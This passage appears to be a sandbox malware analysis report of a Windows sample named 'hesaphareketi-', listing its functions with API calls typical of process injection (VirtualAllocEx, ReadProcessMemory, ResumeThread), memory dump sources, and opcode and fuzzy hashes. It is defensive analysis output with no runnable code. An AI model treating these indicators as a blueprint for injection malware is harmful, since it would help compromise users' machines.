                                            • Instruction Fuzzy Hash: FD2107B1D003098FDB10DFAAD485BEEBBF5AF48210F54842AD559A7241CB789945CFA4
                                            Function 0757BA68 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0757BAE8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 050629ffe6fbf7f7fe5964aa5f2ef660c7f33f97eff9c8a2fdb1777d1dab242a
                                            • Instruction ID: 76b0a01f1572314d2be6d560ee833500061b824a390b495a512ac8e29dff785a
                                            • Opcode Fuzzy Hash: 050629ffe6fbf7f7fe5964aa5f2ef660c7f33f97eff9c8a2fdb1777d1dab242a
                                            • Instruction Fuzzy Hash: D221F8B1C003599FDB10DFAAD841BDEBBF5FF48310F50842AE919A7240CB799941CBA4
                                            Function 0757B8B2 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0757B926
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 3b7b61713581443be4a135ae9859a73b4ec7208e6b59ce0ee9e2e00e8edb3c63
                                            • Instruction ID: cae1e01bd027982aa62c50d56018e830493d7062e1eb69075261c87312ab6e29
                                            • Opcode Fuzzy Hash: 3b7b61713581443be4a135ae9859a73b4ec7208e6b59ce0ee9e2e00e8edb3c63
                                            • Instruction Fuzzy Hash: 98114A75C003499FDB20DFAAD845BEEBFF5EF48320F14881AE515A7650C7359941CBA1
                                            Function 00DFD420 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DFD9F9,00000800,00000000,00000000), ref: 00DFDBEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 387cf1b8c03fc9044c8480ce4d06f108616b56feaa88b1aef24fdfae41d5a0a8
                                            • Instruction ID: c952eaf5bdccf38f6a5284f78d02c43b134c660a42f88be01335fce4ca41c567
                                            • Opcode Fuzzy Hash: 387cf1b8c03fc9044c8480ce4d06f108616b56feaa88b1aef24fdfae41d5a0a8
                                            • Instruction Fuzzy Hash: 321114B6C003099FDB20DF9AD444BAEFBF6EB48310F16842AE519A7300C775A945CFA5
                                            Function 0757AEB8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0075C6F), ref: 0757AF22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 12b163574077a800d5e320326dcb9615ec273fe0550ddbf855bc1c4be5b8c371
                                            • Instruction ID: a84471b3224639b8bbca101b825bda6f8c5262ccfa5280df071471c5227c9280
                                            • Opcode Fuzzy Hash: 12b163574077a800d5e320326dcb9615ec273fe0550ddbf855bc1c4be5b8c371
                                            • Instruction Fuzzy Hash: 80115BB5D003498FDB20DFAAD4457EEFBF5EB48220F14841AD515A7640CB796941CB94
                                            Function 0757B8B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0757B926
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a3fbe06f6a079e19ec9fbe86c3d2fc58d14cd9bb1305e5098e1e4497ae025156
                                            • Instruction ID: b82cba6345795fd8396f43ff5af34044a42709ebda9ab7f865af101af81394b7
                                            • Opcode Fuzzy Hash: a3fbe06f6a079e19ec9fbe86c3d2fc58d14cd9bb1305e5098e1e4497ae025156
                                            • Instruction Fuzzy Hash: 141126B5C003499FDB20DFAAD845BDEBBF5EF48320F54881AE525A7250CB75A941CFA0
                                            Function 00DFDB78 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DFD9F9,00000800,00000000,00000000), ref: 00DFDBEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 67930bcf365ef50e5e9bd15a7c08851b02373a03af675904d1a84a6e29530452
                                            • Instruction ID: ab85c72749db17ff537ba15ac0db24cbc2ba55569a87decac583e7ebc43becb1
                                            • Opcode Fuzzy Hash: 67930bcf365ef50e5e9bd15a7c08851b02373a03af675904d1a84a6e29530452
                                            • Instruction Fuzzy Hash: 6A1164B6D003088FDB10CFAAD444BDEFBF6AB48310F16842ED519A7200C779A945CFA0
                                            Function 0757AEC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0075C6F), ref: 0757AF22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 34171b254ba23db626e079cee86371d9c8f35ecd2a050b892683579e062ec9a5
                                            • Instruction ID: 75a829a3919b160785dbb7751e34c9cce17484e539f95d0a0ab526595378814d
                                            • Opcode Fuzzy Hash: 34171b254ba23db626e079cee86371d9c8f35ecd2a050b892683579e062ec9a5
                                            • Instruction Fuzzy Hash: 371128B5D003498FDB20DFAAD4457DEFBF5AB48220F14881AD519A7240CB79A941CB94
                                            Function 0757F278 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0757F2DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 08cacac8000b6ee4c18711821f182dc59221292b1a170196d1ab1b5f85518005
                                            • Instruction ID: 3637f937e2d809c3f171ef0656cb491c5442309120b15ec175d19de04363771d
                                            • Opcode Fuzzy Hash: 08cacac8000b6ee4c18711821f182dc59221292b1a170196d1ab1b5f85518005
                                            • Instruction Fuzzy Hash: D91136B58003499FDB20DF9AE845BDEBBF4FB48320F10841AE414A7740C375A941CFA1
                                            Function 0757CB38 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0757F2DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: a7d5c1e351cb96d430b35afa5112c489bf4c6e88c0cfcc00f44ca40bde223ff3
                                            • Instruction ID: 2a8cbfe70a9e35447b367a5becbaef0ddf127ec6bdbabce6dd367ca2f2ad1aad
                                            • Opcode Fuzzy Hash: a7d5c1e351cb96d430b35afa5112c489bf4c6e88c0cfcc00f44ca40bde223ff3
                                            • Instruction Fuzzy Hash: 4211F2B58003499FDB20DF9AD845BDEBBF8FB48324F10881AE519A7240C376A945CFA5
                                            Function 00DFD918 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00DFD97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 9b00b23a4f733c45b4c9f9445330ec92e1dd47702f00d4b7974f6b54ae4c8680
                                            • Instruction ID: caadf2893c8a66c5ccc5a51804221e80ecb33b1b0439cfb521fca993a261a6ce
                                            • Opcode Fuzzy Hash: 9b00b23a4f733c45b4c9f9445330ec92e1dd47702f00d4b7974f6b54ae4c8680
                                            • Instruction Fuzzy Hash: 4C1102B5C003498FCB10CF9AD444A9EFBF5EB48314F15841AD519A7200C379A945CFA1
                                            Function 0577D8B0 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq
                                            • API String ID: 0-1594803414
                                            • Opcode ID: 7eabc3106ab8ca7e27a6f0c358afcf94ed34d1ea4a0773d0c75f54ec0d9e07b0
                                            • Instruction ID: 11ccf2a6963567692d4d90a4376f806500a4eaf2bb9ac820340b369c3c5ed853
                                            • Opcode Fuzzy Hash: 7eabc3106ab8ca7e27a6f0c358afcf94ed34d1ea4a0773d0c75f54ec0d9e07b0
                                            • Instruction Fuzzy Hash: B561B235A002088FCF15DF74D494AAE7BF6EF89300B1580AAE905EB362DA35DD06DB51
                                            Function 05776810 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq
                                            • API String ID: 0-1594803414
                                            • Opcode ID: 2fa49985efb99a670f331d082a3fad6e6efa93b937e293a2f1cbba65a184681b
                                            • Instruction ID: 01a1dd7c3974c20817f3ececf461c9c2f0417a1e06fc073ea0035394e10e7d3a
                                            • Opcode Fuzzy Hash: 2fa49985efb99a670f331d082a3fad6e6efa93b937e293a2f1cbba65a184681b
                                            • Instruction Fuzzy Hash: 4B4144327006185FCB05AF78E89477F7AA7EBC5711B588029E806DB395DE38CC0697E1
                                            Function 0577CAE8 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll, xrefs: 0577CBFD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll
                                            • API String ID: 0-2445627988
                                            • Opcode ID: 4b6e86ec702b6ae2b3fff1fe5d1904ec50fa2bf8031e32d5a5fd08b12c26c258
                                            • Instruction ID: 49c882743d014cfec28d5e39b3b74b4c774f4b9757bca8e94ab631c38e61580c
                                            • Opcode Fuzzy Hash: 4b6e86ec702b6ae2b3fff1fe5d1904ec50fa2bf8031e32d5a5fd08b12c26c258
                                            • Instruction Fuzzy Hash: 9D41E574A0422C8FCF14EB68D898B9DB7B5BF4C704F114069E505AB3A1DB34AC01DBA0
                                            Function 0577CDB8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Strings
                                            • C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll, xrefs: 0577CE7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll
                                            • API String ID: 0-2445627988
                                            • Opcode ID: 8115bb5759e2f8f4d097b4b8cb997f4d43154658a1ee3f781e09b87c1a6c7eee
                                            • Instruction ID: 9e92000eacbf27d2836ec3248663b0977bea8f7a8c35fdfdf6aa46316b3d9ae9
                                            • Opcode Fuzzy Hash: 8115bb5759e2f8f4d097b4b8cb997f4d43154658a1ee3f781e09b87c1a6c7eee
                                            • Instruction Fuzzy Hash: 7C2190343412158FCB2ADB38D854A297BEABF8971571580AEE506CF3B1DB71DC06CB51
                                            Function 0577A477 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8q
                                            • API String ID: 0-4083045702
                                            • Opcode ID: 62ed721bae6737b86bb3f5f8fda6dd594a1cc5564f0a604da398cadad10edfa1
                                            • Instruction ID: c632a19d353c44c8f5cb40d4c68defd952b9d020af41f97f8929abf3d04c9a7f
                                            • Opcode Fuzzy Hash: 62ed721bae6737b86bb3f5f8fda6dd594a1cc5564f0a604da398cadad10edfa1
                                            • Instruction Fuzzy Hash: 44219A757006149FDB24EB2AE484E6DB7E6FF88710705802AF606CB762DB31EC02DB60
                                            Function 05776BA8 Relevance: .8, Instructions: 800COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c90c4a0c11a6ef8777e7842fcedc8a1a7ce2c5a1013aa86fbfdc10df4a8a2d9c
                                            • Instruction ID: 6c5d899b2f6d49ea08a389fa1c78bcc4d304f770e40035302ef133a93dffb4c0
                                            • Opcode Fuzzy Hash: c90c4a0c11a6ef8777e7842fcedc8a1a7ce2c5a1013aa86fbfdc10df4a8a2d9c
                                            • Instruction Fuzzy Hash: 2E7202B0F04B898BDF789F7CA4887ADBEA1FB51301F10495ED0EACA695DB349481DB05
                                            Function 05776BE8 Relevance: .4, Instructions: 449COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6da5eb29f3ed6af3256cb5a1c3c5df49df91ecc92e3615e9552ef8bb78a35b6e
                                            • Instruction ID: cc56b5c323d57ef673faa8de5d5897d4be04c7fcf9e67d93510daeb74c09bb24
                                            • Opcode Fuzzy Hash: 6da5eb29f3ed6af3256cb5a1c3c5df49df91ecc92e3615e9552ef8bb78a35b6e
                                            • Instruction Fuzzy Hash: C2124EF0A05BC64ADF789F6C958879EBE90FB15300F20495BC0FAC9659D7349086EB49
                                            Function 0A8C0458 Relevance: .3, Instructions: 251COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66349ad6814b9a2966f0fdc934445e6b1e2d9c16e8d5cafbce2f837669c69c83
                                            • Instruction ID: 991ab2f5a98d4398bdb3c075b82b73c4e69d55e91267bb524b088e115f8c3637
                                            • Opcode Fuzzy Hash: 66349ad6814b9a2966f0fdc934445e6b1e2d9c16e8d5cafbce2f837669c69c83
                                            • Instruction Fuzzy Hash: 47A14930B052089FDB14DF68D594BAEB7F6AF88744F2580A9E505EB3A2DA30ED01CF51
                                            Function 0577B808 Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a2f551c1cc49839709df7b2a94c198010ecebf21cb994a44acc769b1e5b195b
                                            • Instruction ID: 75a8644e1e90cb3ad16dab91893946be6944884c2dbce509d141ca78ad721be1
                                            • Opcode Fuzzy Hash: 5a2f551c1cc49839709df7b2a94c198010ecebf21cb994a44acc769b1e5b195b
                                            • Instruction Fuzzy Hash: C881E034710604CFCB44EF28D498E697BF6BF89A05B1581A9E506CB371EB71ED06DB90
                                            Function 0577A610 Relevance: .2, Instructions: 168COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f15812e1fc0fa2deef3edeb781979dd89d8b4fc92f8377b6eb7bf1219f45290
                                            • Instruction ID: 01e9cef5488e677904147c9b506223227d27a15109eb0f33e96cbdf5851028ac
                                            • Opcode Fuzzy Hash: 2f15812e1fc0fa2deef3edeb781979dd89d8b4fc92f8377b6eb7bf1219f45290
                                            • Instruction Fuzzy Hash: 2C717E78A01208EFDB15DF69E498DAEBBB6FF49710B114098F901AB361DB31EC81DB50
                                            Function 057726C4 Relevance: .2, Instructions: 155COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30a8e3c8e947e3a6872cfe600cf5585e9dd9e19750bb0b2258450e6ae99810ba
                                            • Instruction ID: 1f8be30c2965acc1502010fd11b65d64bb09b4f47b14a9b4195d36bb4e3d72a3
                                            • Opcode Fuzzy Hash: 30a8e3c8e947e3a6872cfe600cf5585e9dd9e19750bb0b2258450e6ae99810ba
                                            • Instruction Fuzzy Hash: 82518375E002499FCF14DFA9D848AAFBFF5EF88210F10842AE525E7351DB7499019BA0
                                            Function 0577A240 Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c8cd2d2732b591ab9081ab66f518ad7053911604dc46f721c380f02fa7e382b
                                            • Instruction ID: b6703e969668172596cac8f9da2ab5328cebaa1bfb92b2b81becc9c8e9e2cb91
                                            • Opcode Fuzzy Hash: 9c8cd2d2732b591ab9081ab66f518ad7053911604dc46f721c380f02fa7e382b
                                            • Instruction Fuzzy Hash: AD51C0317043048FDB14EF68E494BAE7BA6EF89310F1484A9D50ADB762CB35EC45DBA1
                                            Function 05773640 Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3590523728a768309b22380c9494baf529f720c129743aae9bdcaa980dcd566
                                            • Instruction ID: 0e7c3370c306323177104a38edac3011802093bfd5ff97660bc906f1d983f66b
                                            • Opcode Fuzzy Hash: b3590523728a768309b22380c9494baf529f720c129743aae9bdcaa980dcd566
                                            • Instruction Fuzzy Hash: AF31A030A1221CEFCF14DFA4E5889ADBFB2FF85310F21896AE48267251CB319955EF41
                                            Function 0577D790 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ccf6f58516dd57b95e8ac5bee517142f59eb4309eeeb8f032300269aaedf486
                                            • Instruction ID: 406eefdff56a6ad4aa1b27c9d77a97bc9f3a98ee0c4166266868fab5ef12241d
                                            • Opcode Fuzzy Hash: 6ccf6f58516dd57b95e8ac5bee517142f59eb4309eeeb8f032300269aaedf486
                                            • Instruction Fuzzy Hash: 2941C635A04248DFCB15CF64D844AAEBBB2FF89700F14809AE949DB362E731DD02DB91
                                            Function 0577A603 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f4e327735daee895d1900f5fff97666fcc9a2f7fae6869a12f19eb7d3f08860
                                            • Instruction ID: b00cc9d4794fab2d5738a51373eb751ec753b55eb33be2873a74bb82fd842211
                                            • Opcode Fuzzy Hash: 3f4e327735daee895d1900f5fff97666fcc9a2f7fae6869a12f19eb7d3f08860
                                            • Instruction Fuzzy Hash: 98518238601208EFDB14DF68D498DAE7BB2FF49721B114499F902AB361DB31EC81DB50
                                            Function 0577B7E3 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e44125d0c4a5bc266d273aac0cc3563e8b2ff7ae2b2e60cb061f3d61bb2cbe39
                                            • Instruction ID: e2002498e143b5ad9bc7aa79c58388f146b92267e0e2d5ef7593a3802636d3e0
                                            • Opcode Fuzzy Hash: e44125d0c4a5bc266d273aac0cc3563e8b2ff7ae2b2e60cb061f3d61bb2cbe39
                                            • Instruction Fuzzy Hash: E631AE35B146948FCB15DB78E4989AD7BF2AF8A604B0540DAE446CB372EB71DC06CB81
                                            Function 05772C5C Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d133598536d9e86edd54244947c6cf5c3e01d93f9a57a5b6741b4a486a607fb
                                            • Instruction ID: 2c72246bc4a068152ffa415e96a92f81d3865786491cf6b4493739dca65f5e5c
                                            • Opcode Fuzzy Hash: 2d133598536d9e86edd54244947c6cf5c3e01d93f9a57a5b6741b4a486a607fb
                                            • Instruction Fuzzy Hash: E441EEB5D0031D9BDF24CFAAC984ADDFBB5BF48304F64842AD418AB201DB756A46CF90
                                            Function 05772C68 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f412be09a6fd7ce18e1958a58b7c42f2f93a32aed4b5ae86fd8db06c07eac161
                                            • Instruction ID: 543910f80cc74707ed68953779369defff93fe65bf6980180e4ff84574d6cf93
                                            • Opcode Fuzzy Hash: f412be09a6fd7ce18e1958a58b7c42f2f93a32aed4b5ae86fd8db06c07eac161
                                            • Instruction Fuzzy Hash: F041CFB5D0031DDBDB24DFAAC984ACDFBB5BF48304F64842AD418AB241DB756A46CF90
                                            Function 05771BE0 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98eff3f19c8b725456fccaa23647ae7a88bf1a6603bc069e65aaf8c1449b21a7
                                            • Instruction ID: 26122f5ded666cf5fc5ffb96d9c2907ebe09a3c04d18f9f9f0b3eb22080b32a3
                                            • Opcode Fuzzy Hash: 98eff3f19c8b725456fccaa23647ae7a88bf1a6603bc069e65aaf8c1449b21a7
                                            • Instruction Fuzzy Hash: 5041CFB0D0075CDFCB24CF9AD884A9EFBB1BF48310F60812AE419AB214DB75A845CF90
                                            Function 057727E8 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c50ac24088e85bc0bd3eab2b2ac39e4c957b2ce788117be767a9475503cf12aa
                                            • Instruction ID: 33f3c1f6114bdd1c6b91775bc735984a2e4bcb402a2b2e5d8865a0856a48025d
                                            • Opcode Fuzzy Hash: c50ac24088e85bc0bd3eab2b2ac39e4c957b2ce788117be767a9475503cf12aa
